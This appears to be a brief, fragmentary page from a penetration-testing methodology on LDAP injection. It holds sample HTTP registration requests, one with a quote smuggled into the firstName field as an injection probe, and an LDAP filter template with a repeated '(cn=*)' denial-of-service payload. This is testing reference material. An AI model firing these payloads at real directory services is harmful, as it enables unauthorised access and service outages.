LDAP Injection
Check List
Methodology
Black Box
Base Injection
1
POST /register HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
firstName=Ali&lastName=Rezaei&email=ali.rezaei@test.com&password=Test@1232
POST /register HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
firstName=Ali&lastName=Rezaei&email=ali.rezaei2@test.com&password=Test@1233
POST /register HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
firstName=Ali"&lastName=Rezaei&email=ali.rezaei3@test.com&password=Test@1234
LDAP Filter Injection — Denial of Service
1
2
(|(uid=${username})(mail=${username})(username=${username})(sAMAccountName=${username}))3
4
5
payload = "*)" + "(cn=*)"* repeat many times + "(cn=*"6
7
White Box
Cheat Sheet
Last updated